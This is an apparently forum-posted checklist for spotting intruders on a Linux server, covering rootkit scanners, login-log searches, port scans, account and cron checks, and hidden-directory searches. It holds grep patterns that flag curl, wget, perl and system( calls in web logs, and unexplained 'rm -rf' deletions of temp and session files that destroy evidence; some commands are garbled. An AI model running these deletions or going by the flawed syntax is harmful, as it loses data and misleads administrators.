View RSS Feed

siosios

How-to detect a possible intruder (Linux Server)

Rate this Entry
Quote Originally Posted by siosios View Post
Advise: this are steps recompiled from the network and a from some books, these were not done by me.

Hello..

I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.

1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.

Code:
Code:
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp
4.- Watch current connections and scan your ports.

Code:
Code:
netstat -nalp
nmap 1-65535 localhost
5.- Search for suspicious content on common explotable dirs.

Code:
Code:
rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
6.- Checking for anomalies on this files.

Code:
Code:
less /etc/passwd 
less /etc/shadow
less /etc/groups
7.- Search for new users at sudoers, check wtmp and telnet is not running.

Code:
Code:
cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
8.- Find bash history files

Code:
Code:
find '/' -iname .bash_history
9 .- Verify the Crontab table

Code:
Code:
crontab -l
10 .- Update the slocate database and search for exploits.

Code:
Code:
updatedb &
For cPanel servers:

Code:
Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl) ' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl) ' /home/*/statistics/logs/*
For Ensim servers:

Code:
Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl) '/home/virtual/site*/fst/var/log/httpd/*
Search for shell code:

Code:
Code:
cat /path/of/your/web/logs/* |grep "/x90/"
11.- Search for hidden dirs

Code:
Code:
locate "..."
locate ".. "
rlocate " .."
locate ". "
locate " ."
12.- Search for perl-scripts running

Code:
Code:
ps -aux | grep perl
13 .- Checking nobody user and open files.

Code:
Code:
service httpd stop
lsof -u nobody
Please, add your tips and tricks about this

Submit "How-to detect a possible intruder  (Linux Server)" to Digg Submit "How-to detect a possible intruder  (Linux Server)" to Google Submit "How-to detect a possible intruder  (Linux Server)" to facebook Submit "How-to detect a possible intruder  (Linux Server)" to reddit Submit "How-to detect a possible intruder  (Linux Server)" to yahoo

Updated 12-26-2011 at 09:48 PM by siosios

Tags: None Add / Edit Tags
Categories
Tech Space

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: